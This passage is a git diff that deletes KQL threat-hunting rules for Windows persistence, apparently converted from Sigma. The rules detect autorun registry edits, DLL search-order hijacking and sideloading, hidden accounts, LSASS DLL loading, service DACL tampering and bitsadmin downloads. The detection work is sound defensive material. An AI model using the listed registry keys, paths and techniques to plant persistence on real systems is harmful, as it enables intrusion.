index de98b896..00000000
--- a/Persistence/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql b/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
deleted file mode 100644
index 9ec0a25c..00000000
--- a/Persistence/Creation_Exe_for_Service_with_Unquoted_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2021/12/30
-// Level: high
-// Description: Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
-Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath =~ "C:\\program.exe"
\ No newline at end of file
diff --git a/Persistence/Creation_Of_Non-Existent_System_DLL.kql b/Persistence/Creation_Of_Non-Existent_System_DLL.kql
deleted file mode 100644
index 973ed62c..00000000
--- a/Persistence/Creation_Of_Non-Existent_System_DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022/12/01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-Usually this technique is used to achieve DLL hijacking.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql b/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
deleted file mode 100644
index b8dc45ff..00000000
--- a/Persistence/Creation_of_a_Local_Hidden_User_Account_by_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/05/03
-// Level: high
-// Description: Sysmon registry detection of a local hidden user account.
-// Tags: attack.persistence, attack.t1136.001
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey contains "\\SAM\\SAM\\Domains\\Account\\Users\\Names" and RegistryKey endswith "$"
\ No newline at end of file
diff --git a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql b/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
deleted file mode 100644
index f9303a14..00000000
--- a/Persistence/Creation_of_an_WerFault.exe_in_Unusual_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/09
-// Level: high
-// Description: Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\wer.dll") and (not((FolderPath contains "\\System32\\" or FolderPath contains "\\SysWOW64\\" or FolderPath contains "\\WinSxS\\")))
\ No newline at end of file
diff --git a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql b/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
deleted file mode 100644
index 47714943..00000000
--- a/Persistence/CurrentControlSet_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver"))))
\ No newline at end of file
diff --git a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
deleted file mode 100644
index d035ba97..00000000
--- a/Persistence/CurrentVersion_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey contains "\\Run" or RegistryKey contains "\\RunOnce" or RegistryKey contains "\\RunOnceEx" or RegistryKey contains "\\RunServices" or RegistryKey contains "\\RunServicesOnce" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not((((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}")) and InitiatingProcessFolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\Setup\\") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith 
"\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith 
"C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey contains "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}" or RegistryKey contains "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}" or RegistryKey contains "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}" or RegistryKey contains "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}")) or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData contains 
"\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair"))))
\ No newline at end of file
diff --git a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql b/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql
deleted file mode 100644
index 93060f91..00000000
--- a/Persistence/CurrentVersion_NT_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" and (RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and (not(((InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or RegistryValueData =~ "(Empty)" or (RegistryKey contains "\\Image File Execution Options" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or ((RegistryKey contains "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or RegistryKey contains "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith 
"C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary") or ((RegistryValueData in~ ("DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval")))))
\ No newline at end of file
diff --git a/Persistence/DLL_Load_via_LSASS.kql b/Persistence/DLL_Load_via_LSASS.kql
deleted file mode 100644
index 0cc97026..00000000
--- a/Persistence/DLL_Load_via_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// Tags: attack.execution, attack.persistence, attack.t1547.008
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Persistence/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Persistence/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql b/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
deleted file mode 100644
index a620c15a..00000000
--- a/Persistence/Default_RDP_Port_Changed_to_Non_Standard_Port.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: high
-// Description: Detects changes to the default RDP port.
-Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
-Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
-
-// Tags: attack.persistence, attack.t1547.010
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index 1a09cc4b..00000000
--- a/Persistence/Deny_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jonhnathan Ribeiro, oscd.community
-// Date: 2020/10/16
-// Level: high
-// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/Persistence/Direct_Autorun_Keys_Modification.kql b/Persistence/Direct_Autorun_Keys_Modification.kql
deleted file mode 100644
index e8025ca6..00000000
--- a/Persistence/Direct_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
-// Tags: attack.persistence, attack.t1547.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "add" and FolderPath endswith "\\reg.exe") and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell")
\ No newline at end of file
diff --git a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql b/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Persistence/Enable_Local_Manifest_Installation_With_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql b/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Persistence/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql b/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
index 30f379f3..00000000
--- a/Persistence/Fax_Service_DLL_Search_Order_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql b/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
deleted file mode 100644
index 46977716..00000000
--- a/Persistence/File_Creation_In_Suspicious_Directory_By_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Vadim Varganov, Florian Roth (Nextron Systems)
-// Date: 2022/08/24
-// Level: high
-// Description: Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
-// Tags: attack.persistence, attack.t1547.001, cve.2022.30190
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\msdt.exe" and (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Start Menu\\Programs\\Startup\\" or FolderPath contains "C:\\PerfLogs\\" or FolderPath contains "C:\\ProgramData\\" or FolderPath contains "C:\\Users\\Public\\")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin.kql b/Persistence/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Persistence/File_Download_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Persistence/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Persistence/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
